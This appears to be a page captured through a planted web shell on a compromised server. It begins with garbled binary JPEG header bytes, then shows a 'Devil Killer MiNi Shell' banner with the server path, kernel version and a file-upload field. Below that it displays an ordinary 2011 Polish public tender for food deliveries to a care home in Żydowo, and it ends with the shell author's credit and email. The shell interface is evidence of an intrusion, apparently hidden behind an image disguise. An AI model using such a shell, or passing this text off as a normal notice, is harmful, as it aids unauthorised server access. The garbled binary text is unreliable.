JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111011/329606-N-2011.html

<p class="kh_header"><b>Żydowo: Dostawa artykułów spożywczych
na potrzeby  Domu Pomocy Społecznej w Żydowie</b><br>
<b>Numer ogłoszenia: 329606 - 2011; data zamieszczenia: 11.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Żydowie , Żydowo 112, 76-012 Żydowo, woj. zachodniopomorskie, tel. 094 3188879, -87, - 89, faks 094 3188879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps.zydowo.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych
na potrzeby  Domu Pomocy Społecznej w Żydowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest sukcesywna dostawa   artykułów spożywczych na potrzeby Domu Pomocy Społecznej w Żydowie na warunkach określonych w SIWZ.
2)Szczegółowy rodzaj-asortyment,terminy dostawy oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe   zestawienie  ilościowe przedmiotu zamówienia z podziałem na osiem części:
Część Nr 1  - Dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin
Część Nr 2   -Dostawa   mięsa drobiowego i podrobów
Część Nr 3   -Dostawa   produktów ogólno spożywczych
Część Nr 4  - Dostawa   pieczywa, świeżych wyrobów piekarskich i  ciastkarskich    
Część Nr 5-Dostawa   mleka i produktów mleczarskich
Część Nr 6 -Dostawa   ryb przetworzonych i konserwowanych
Część Nr 7 -Dostawa   owoców i warzyw
Część Nr 8 -Dostawa   jaj konsumpcyjnych                                                     
3) Dostarczane artykuły żywnościowe muszą być odpowiednio posortowane przez Wykonawcę i muszą być najwyższej jakości, w tym przede wszystkim muszą odpowiadać wymaganiom jakościowym stosownie do obowiązujących przepisów oraz muszą spełniać obowiązujące w tym zakresie normy sanitarno - epidemiologiczne, a także muszą być przechowywane i transportowane w warunkach gwarantujących najwyższą jakość. Ponadto mięso i wędliny mają być dostarczane w czystych plastikowych pojemnikach dopuszczonych do kontaktu z żywnością spełniających wymogi sanitarno-higieniczne.
4) Artykuły spożywcze dostarczane w oryginalnych opakowaniach, muszą mieć na opakowaniu oznaczenia fabryczne tzn. rodzaj, nazwę wyrobu, ilość, datę produkcji, termin przydatności do spożycia lub termin minimalnej trwałości, nazwę i adres  producenta oraz inne oznakowania zgodne z obowiązującymi przepisami.
5) Producent(wytwórca) oferowanych wyrobów winien posiadać certyfikat systemu HACCP  lub potwierdzenie wdrożenia systemu HACCP lub Handlowy Dokument  Identyfikacyjny wystawione przez organy uprawnione do urzędowej kontroli żywności.
6) Wykonawca musi zagwarantować odpowiedni okres ważności dostarczanych produktów, min. ? okresu określonego przez producenta, liczony od dnia dostawy.
7)Gwarancja rozpoczyna swój bieg od daty odbioru przez osobę upoważnioną ze strony Zamawiającego  każdej partii towaru.
8)Dostarczane artykuły spożywcze, w zależności od ich kategorii muszą  posiadać wszystkie  niezbędne  dokumenty wymagane przepisami prawa  żywnościowego, które Wykonawca zobowiązuje się okazać   na każde żądanie Zamawiającego.
9)Wykonawca zobowiązany jest do dostarczenia przedmiotu zamówienia  do magazynu żywnościowego  siedziby Zamawiającego własnym środkiem transportu na własny koszt i ryzyko. 
10) Zamawiający zastrzega sobie prawo do niewykorzystania  pełnego limitu ilościowego przedmiotu zamówienia   bez prawa roszczeń z tego  tytułu przez Wykonawcę ,a w  szczególności z tytułu niezrealizowania umowy do pełnej wartości. Przysługuje mu tylko zapłata za faktycznie dostarczoną ilość.
11) Zamawiający zastrzega sobie prawo zmian ilościowych w ramach asortymentu  określonego w  załączniku nr 1 do niniejszej siwz w granicach ogólnej wartości zamówienia.  
12) W przypadku otrzymania artykułów spożywczych o niewłaściwej jakości zdrowotnej, handlowej czy braku dokumentów jakościowych Zamawiający odmówi przyjęcia lub zgłosi niezwłocznie reklamacje  w dniu dostawy.
13) Strony uważają za wiążące reklamacje składane przez Zamawiającego telefonicznie lub faksem.
14) W razie odrzucenia reklamacji na wady przedmiotu zamówienia przez Wykonawcę ,Zamawiający  może  zażądać przeprowadzenia ekspertyzy przez właściwego rzeczoznawcę .Jeżeli reklamacja Zamawiającego okaże się uzasadniona, koszty związane z ekspertyzą ponosi Wykonawca
15)Wykonawca zobowiązuje się odebrać  artykuły spożywcze nie spełniające wymagań jakościowych   i wymienić na wolne od wad - w terminie jednego dnia od momentu zgłoszenia własnym    środkiem  transportu na własny koszt i ryzyko .Wykonawca podpisuje odbiór artykułów   spożywczych nie spełniających  wymagań.
16) W przypadku gdy  Wykonawca nie dostarczy przedmiotu zamówienia lub dostawa nie nastąpi w  terminie ,Zamawiający zastrzega sobie prawo dokonania zakupu  interwencyjnego od innego   dostawcy w ilości i asortymencie nie zrealizowanej dostawy.
17) W przypadku zakupu interwencyjnego Wykonawca zobowiązany jest do zwrotu Zamawiającemu różnicy pomiędzy ceną zakupu interwencyjnego,a  ceną dostawy ustaloną w zawartej z  Wykonawcą umowie.
18) Płatność będzie realizowana sukcesywnie po każdej dostawie przedmiotu zamówienia do   Zamawiającego,  na podstawie faktur  wystawianych na płatnika  Dom Pomocy Społecznej  w  Żydowie  w terminie 30 dni, licząc od daty  doręczenia  faktury do  Zamawiającego. Należność płatna przelewem na rachunek Wykonawcy.
19)Termin wykonania zamówienia:od dnia 01.01.2012r.do dnia 31.12.2012r. 20)Realizacja dostaw będzie następować sukcesywnie zgodnie z  zamówieniem składanym przez Zamawiającego telefonicznie lub faksem  z terminem realizacji określonym w zał. Nr 1 do siwz.
21)Jako termin realizacji dostawy rozumie się datę złożenia podpisu na dokumencie odbioru dostawy przez  osobę  upoważnioną do odbioru ze strony Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.80.00.00-6, 15.30.00.00-1, 15.60.00.00-4, 15.81.00.00-9, 15.40.00.00-2, 15.50.00.00-3, 15.20.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia  wadium .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany udokumentować wykonanie w okresie ostatnich trzech lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej jednej dostawy  odpowiadającej swoim  rodzajem oraz porównywalną  wartością dostawom  stanowiącym przedmiot zamówienia  tj.dostawa  artykułów spożywczych    Część Nr ...........  Wykonawca musi złożyć wykaz  na/wg   załącznika nr 5 do SIWZ wraz z   wymaganymi   dokumentami potwierdzajacymi, że dostawy zostały wykonane lub są wykonywane należycie. Ocena spełniania w/w warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie
UWAGA! 
W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W takich przypadkach Wykonawca musi przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).

Ocena spełniania w/w warunku zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.
UWAGA! 
W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W takich przypadkach Wykonawca musi przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).

Ocena spełniania w/w warunku zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) SZCZEGÓŁOWE ZESTAWIENIE ILOŚCIOWE PRZEDMIOTU   
    ZAMÓWIENIA  Część Nr................ wypełnione na/wg Załącznika nr 1 do SIWZ.
2) WYPEŁNIONY FORMULARZ OFERTOWY  na/wg Załącznika nr 2 do SIWZ. 3) Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) lub UPOWAŻNIENIE(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy ewentualnie inne działania np. podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych dokumentów. W przypadku gdy Wykonawca prowadzi działalność w formie spółki cywilnej, a oferta nie zostanie podpisana przez wszystkich wspólników, należy przedłożyć dodatkowe dokumenty, z których będą wynikały   uprawnienia wspólnika(ów) podpisujących ofertę (umowa spółki,   
pełnomocnictwo lub inne).
4) OŚWIADCZENIA WYKONAWCY, ze posiada atesty na dostarczane    
    produkty(HACCP lub Handlowy Dokument  Identyfikacyjny),a także oświadczenie, iż na każde żądanie Zamawiającego   przedstawi dokumenty   potwierdzające to  oświadczenie na/wg Załącznika nr 7 do SIWZ
 
UWAGA! 
OFERTA, WYKAZY I OŚWIADCZENIA WYKONAWCY MUSZĄ BYĆ ZŁOŻONE W FORMIE ORYGINAŁÓW. INNE DOKUMENTY WYMIENIONE W PUNKCIE VI  MUSZĄ BYĆ ZŁOŻONE WRAZ Z OFERTĄ w formie oryginałów lub kopii poświadczonych -za zgodność z oryginałem- (każda zapisana strona).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.zydowo.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w formie papierowej w siedzibie Domu Pomocy Społecznej w Żydowie 107, pok.3, w dni robocze w godz. od 9.00 - 14.00,tel.(094)  318-88-87 wew.34, fax:  094  318-88-89.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2011 godzina 10:00, miejsce: DOM POMOCY SPOŁECZNEJ W ŻYDOWIE   76 - 012 Żydowo107,
pow. Koszalin ,  pokój nr 5(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin zgodnie na warunkach określonych w SIWZ.
Szczegółowy rodzaj-asortyment  oraz ilość  określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe   zestawienie  ilościowe przedmiotu zamówienia   Część Nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa   mięsa drobiowego i podrobów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   mięsa drobiowego i podrobów na warunkach określonych w SIWZ. Szczegółowy rodzaj-asortyment  oraz ilość  określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe  zestawienie  ilościowe przedmiotu zamówienia Część Nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa   produktów ogólno spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   produktów ogólno spożywczych (przyprawy,kompoty,oleje roślinne,warzywa i owoce przetworzone,produkty przemiału ziarna,skrobi i produktów skrobiowych)na warunkach okreslonych w SIWZ.Szczegółowy rodzaj-asortyment  oraz ilość    określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe    zestawienie  ilościowe przedmiotu zamówienia Część Nr 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa   pieczywa, świeżych wyrobów piekarskich i  ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   pieczywa, świeżych wyrobów piekarskich i  ciastkarskich na warunkach okreslonych w SIWZ.Szczegółowy rodzaj-asortyment ,terminy dostawy oraz ilość określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe    zestawienie  ilościowe przedmiotu zamówienia Część Nr 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa   mleka i produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   mleka i produktów mleczarskich na warunkach okreslonych w SIWZ.Szczegółowy rodzaj-asortyment ,termin dostawy oraz ilość  określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe   zestawienie  ilościowe przedmiotu zamówienia Częśc Nr5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa   ryb przetworzonych i konserwowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   ryb przetworzonych i konserwowanych na warunkach określonych w SIWZ.Szczegółowy rodzaj-asortyment ,terminy dostawy oraz ilość określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe  zestawienie  ilościowe przedmiotu zamówienia Część Nr 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa   owoców i warzyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   owoców i warzyw na warunkach okreslonych w SIWZ.Szczegółowy rodzaj-asortyment ,terminy dostawy oraz ilość  określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe  zestawienie  ilościowe przedmiotu zamówienia 
Część Nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa   jaj konsumpcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa   jaj konsumpcyjnych w ilosci szacunkowej 40000 szt na warunkach okreslonych w SIWZ.Terminy dostawy oraz ilość  określa  załącznik   nr 1 do  Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe  zestawienie  ilościowe przedmiotu zamówienia 
Część Nr 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.00.00-4, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com